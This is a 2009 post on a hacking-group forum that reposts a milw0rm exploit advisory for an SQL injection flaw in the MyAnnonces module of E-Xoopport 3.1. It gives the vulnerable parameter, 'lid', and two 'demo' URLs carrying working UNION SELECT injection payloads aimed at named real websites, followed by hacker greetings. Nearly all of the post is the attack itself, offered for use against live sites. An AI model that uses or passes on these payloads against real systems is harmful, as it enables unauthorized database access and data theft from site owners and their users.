Multi Ethnic Hacking Group


    E-Xoopport 3.1 Module MyAnnonces (lid) SQL Injection Vulnerability

    Share
    avatar
    Foxi
    Admin

    Posts : 92
    Reputation : -1
    Join date : 2009-07-08

    E-Xoopport 3.1 Module MyAnnonces (lid) SQL Injection Vulnerability

    Post by Foxi on Thu Jul 23, 2009 4:29 am

    Code:
     ================================================================================================

     Title    : Remote SQL Injection Vulnerability
     Software : MyAnnonces Module for E-Xoopport 3.1
     Vendor  : http://www.e-xoopport.it/
     
     Date    : 17 July 2009 (Indonesia)
     Author  : Vrs-hCk
     Contact  : d00r@telkom.net
     Blog    : http://c0li.blogspot.com/

     ================================================================================================

     [-] Exploit

        http://[site]/[path]/modules/MyAnnonces/index.php?pa=viewannonces&lid=[SQLi]

     [-] Demo

        http://www.focolaccia.org/modules/MyAnnonces/index.php?pa=viewannonces&lid=-41' union select 1,2,3,4,version(),6,7,8,9,0,1,2,3,4,5,6,7/*
        http://www.annuncisolidali.it/modules/MyAnnonces/index.php?pa=viewannonces&lid=-1946' union select 1,2,3,4,version(),6,7,8,9,0,1,2,3,4,5,6,7/*

     ================================================================================================

     Greetz  :

        www.MainHack.net - www.ServerIsDown.org - www.LuvNova.info
        Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
        bl4Ck_3n91n3, H312Y, S3T4N, xr00tb0y, Janroe, c0li.m0de.0n and Behave oR BeGone !!!

     ================================================================================================

    # milw0rm.com [2009-07-20]


      Current date/time is Fri Mar 24, 2017 5:58 pm